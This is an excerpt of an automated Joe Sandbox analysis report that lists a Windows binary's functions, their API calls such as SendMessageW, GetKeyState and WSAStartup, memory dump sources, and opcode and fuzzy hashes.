                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                              • Instruction ID: 4b2d6ea17a3ac4ab78af940a08b88c8299f608aa6f4c5d53add510bf8c89f191
                                                                                                                              • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                              • Instruction Fuzzy Hash: A001F9722107016ED7149B78D807A66BBA8DF587A0F50C53EF95ECB1D1EB71E5408B90
                                                                                                                              Function 0018F2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                              • Instruction ID: 6ce5e1385b546545f9044f508dee579d376b369912a932294daab8e8680dd3ef
                                                                                                                              • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                              • Instruction Fuzzy Hash: 8401D631104A01EBCB35BF28D845A5ABBB9EFA1360B50853DFC5847251DB31A956CBA1
                                                                                                                              Function 00175116 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00175A39,?,?,?,-00000003,00000000,00000000), ref: 0017514E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3964851224-0
                                                                                                                              • Opcode ID: 7c490d365fd06f2957d6107979668b4e57d94f8c274ed123ba4c1938a51c8b20
                                                                                                                              • Instruction ID: b9d34b1177392d2ecc2de7c7def99250a4a3e4284d4ca5da579c512eac552942
                                                                                                                              • Opcode Fuzzy Hash: 7c490d365fd06f2957d6107979668b4e57d94f8c274ed123ba4c1938a51c8b20
                                                                                                                              • Instruction Fuzzy Hash: 0BF0F07A200A21ABC7215B14D800B2EFBB6EF50F62F40C229E44D46650CBB1D820CBD4
                                                                                                                              Function 001C95AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 001C95C9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Startup
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 724789610-0
                                                                                                                              • Opcode ID: dc2f1193a0010be0096ae0715fc570a54989566ec21e48555a0e48732621f17d
                                                                                                                              • Instruction ID: a527b69371e0da3f0752c286eca25ae4d3c8c05a0f3c8ea7199faf7ffcf2100d
                                                                                                                              • Opcode Fuzzy Hash: dc2f1193a0010be0096ae0715fc570a54989566ec21e48555a0e48732621f17d
                                                                                                                              • Instruction Fuzzy Hash: 24E0E5332042146BC310EA64EC05AABB799BF85724F14871AFDA48B2C1EB30DD14C7C1
                                                                                                                              Function 00173E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,001734E2,?,00000001), ref: 00173E6D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeLibrary
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3664257935-0
                                                                                                                              • Opcode ID: 9ca78eb3e3bbf051be0d2f326b4252661689a794cccd3a161fa712ce5d98971b
                                                                                                                              • Instruction ID: 28f0a30b085af2fc252d24c75908aa85dcce13c17354f88cb2dfae05f86957ab
                                                                                                                              • Opcode Fuzzy Hash: 9ca78eb3e3bbf051be0d2f326b4252661689a794cccd3a161fa712ce5d98971b
                                                                                                                              • Instruction Fuzzy Hash: 8FF03971105751CFCB389F64E890826BBF1BF14715324CA3EE1EA82621DB31A944EF00
                                                                                                                              Function 001B79F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 001B7A11
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FolderPath_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3334745507-0
                                                                                                                              • Opcode ID: 3aa5ab2f190c0fec7de7fffbc8c57035b2b04ae3d5957af36cceeea2b8e08d49
                                                                                                                              • Instruction ID: 636ee4e75b89393a45a6f1e25c37e6ea30cfbbb8ce3107dddab943d4d1136afa
                                                                                                                              • Opcode Fuzzy Hash: 3aa5ab2f190c0fec7de7fffbc8c57035b2b04ae3d5957af36cceeea2b8e08d49
                                                                                                                              • Instruction Fuzzy Hash: 74D05EA65002282FDB50E6249C0ADFB36ADC744104F0042A0786DD2042EA20AE8586E0
                                                                                                                              Function 0017193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00171952
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendTimeout
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1599653421-0
                                                                                                                              • Opcode ID: e2281060d467d83200060d0fb3b6a3ae6455fcc2474ea2ad00ddcc0cb6c57e69
                                                                                                                              • Instruction ID: 3a9bb49c4de5a7a4fb8f0ab17075257bbef0e1a4e9c1e2efb2b146ae8feb1591
                                                                                                                              • Opcode Fuzzy Hash: e2281060d467d83200060d0fb3b6a3ae6455fcc2474ea2ad00ddcc0cb6c57e69
                                                                                                                              • Instruction Fuzzy Hash: 62D012F16902087EFB008761DD07EBB775CD721F81F4046617E06D64D1D6649E498570
                                                                                                                              Function 001AE390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00171952
                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001AE3AA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1777923405-0
                                                                                                                              • Opcode ID: b41cf61fa66fa5029ef341ad9564600555ba719cacfb9fbc057aef56b75c42c6
                                                                                                                              • Instruction ID: e39a6502fdbb69368e95be104dd10aff35d16897644d941c81ea92d0a9568899
                                                                                                                              • Opcode Fuzzy Hash: b41cf61fa66fa5029ef341ad9564600555ba719cacfb9fbc057aef56b75c42c6
                                                                                                                              • Instruction Fuzzy Hash: 0ED01235144110AAFE706B18FC06FD577A29F41750F114459F580AB0E5C7D25C819540
                                                                                                                              Function 001C6FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: TextWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 530164218-0
                                                                                                                              • Opcode ID: fc5840862ff5d9c598668478a31fa7d74f95d2d1f16acabc02493420135ded42
                                                                                                                              • Instruction ID: 5a7eff0004b7261875bfda48a31f10a54d8e42c17cc553ab59078675dab2cc89
                                                                                                                              • Opcode Fuzzy Hash: fc5840862ff5d9c598668478a31fa7d74f95d2d1f16acabc02493420135ded42
                                                                                                                              • Instruction Fuzzy Hash: C9D067362105149FC701AB99E848C95B7E9EB5D6103018051F50ADB631D661E9509B91
                                                                                                                              Function 00174FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,001E49DA,?,?,00000000), ref: 00174FC4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 973152223-0
                                                                                                                              • Opcode ID: 0cd9338c87b588fae193cecae8519fa9126bb5095ab6ed7ca34d3f0f772c4d89
                                                                                                                              • Instruction ID: 1b9ef2d3c68f5a656c5f4c54f8db7435dd546708aee05c69dd00e8a9c504d164
                                                                                                                              • Opcode Fuzzy Hash: 0cd9338c87b588fae193cecae8519fa9126bb5095ab6ed7ca34d3f0f772c4d89
                                                                                                                              • Instruction Fuzzy Hash: 67D0C974640208BFEB00CB90DC46FAA7BBDEB04718F200194F600A62D0D2F2BE808B55
                                                                                                                              Function 001E4DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClearVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1473721057-0
                                                                                                                              • Opcode ID: 1e1009395c19b30cea66c926b436eb823f69369150526ab1505adccd8ab0cef4
                                                                                                                              • Instruction ID: f24b31ef50817ca0161c53c299b193a1d3e3411fa828a4fb664ee52ed99e090e
                                                                                                                              • Opcode Fuzzy Hash: 1e1009395c19b30cea66c926b436eb823f69369150526ab1505adccd8ab0cef4
                                                                                                                              • Instruction Fuzzy Hash: F8D012B1500201DFEB30AF69F80475AB7E4BF55300F24882DE9C682550DB76E9C2DF11
                                                                                                                              Function 001750EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CloseHandle.KERNEL32(?,?,?,001E5950), ref: 0017510C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2962429428-0
                                                                                                                              • Opcode ID: 0491ff965ea2454eb7ad63978534d4894d79ec67a8d3bc2a28b6f9a36f468b6a
                                                                                                                              • Instruction ID: 0cd97d666b386f928fe989f5868d67114eb4005a381c29c067b9472cfd74a084
                                                                                                                              • Opcode Fuzzy Hash: 0491ff965ea2454eb7ad63978534d4894d79ec67a8d3bc2a28b6f9a36f468b6a
                                                                                                                              • Instruction Fuzzy Hash: 40E0B675504B02CBC3354F1AE804412FBF6FFE13613218A2FD0E9826A0D7B05486DB90

                                                                                                                              Non-executed Functions

                                                                                                                              Function 001DF5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 001DF64E
                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001DF6AD
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 001DF6EA
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001DF711
                                                                                                                              • SendMessageW.USER32 ref: 001DF737
                                                                                                                              • _wcsncpy.LIBCMT ref: 001DF7A3
                                                                                                                              • GetKeyState.USER32(00000011), ref: 001DF7C4
                                                                                                                              • GetKeyState.USER32(00000009), ref: 001DF7D1
                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001DF7E7
                                                                                                                              • GetKeyState.USER32(00000010), ref: 001DF7F1
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001DF820
                                                                                                                              • SendMessageW.USER32 ref: 001DF843
                                                                                                                              • SendMessageW.USER32(?,00001030,?,001DDE69), ref: 001DF940
                                                                                                                              • SetCapture.USER32(?), ref: 001DF970
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 001DF9D4
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 001DF9FA
                                                                                                                              • ReleaseCapture.USER32 ref: 001DFA05
                                                                                                                              • GetCursorPos.USER32(?), ref: 001DFA3A
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 001DFA47
                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 001DFAA9
                                                                                                                              • SendMessageW.USER32 ref: 001DFAD3
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 001DFB12
                                                                                                                              • SendMessageW.USER32 ref: 001DFB3D
                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001DFB55
                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 001DFB60
                                                                                                                              • GetCursorPos.USER32(?), ref: 001DFB81
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 001DFB8E
                                                                                                                              • GetParent.USER32(?), ref: 001DFBAA
                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 001DFC10
                                                                                                                              • SendMessageW.USER32 ref: 001DFC40
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 001DFC96
                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001DFCC2
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 001DFCEA
                                                                                                                              • SendMessageW.USER32 ref: 001DFD0D
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 001DFD57
                                                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001DFD87
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 001DFE1C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                              • String ID: @GUI_DRAGID$F
                                                                                                                              • API String ID: 3461372671-4164748364
                                                                                                                              • Opcode ID: e6a35355fd9e7663e19ff96cc4181a9e88087f599e02c1789bed48c31f474738
                                                                                                                              • Instruction ID: 92ce828a1b5618e3f739c4f686a02e3bbadad0bcf76ddf5bcce7121d00030455
                                                                                                                              • Opcode Fuzzy Hash: e6a35355fd9e7663e19ff96cc4181a9e88087f599e02c1789bed48c31f474738
                                                                                                                              • Instruction Fuzzy Hash: 3732AA70208201AFDB14DF64D884AAABBE6FF48354F14062EF696877B1D730EE52CB51
                                                                                                                              Function 001DA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 001DAFDB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
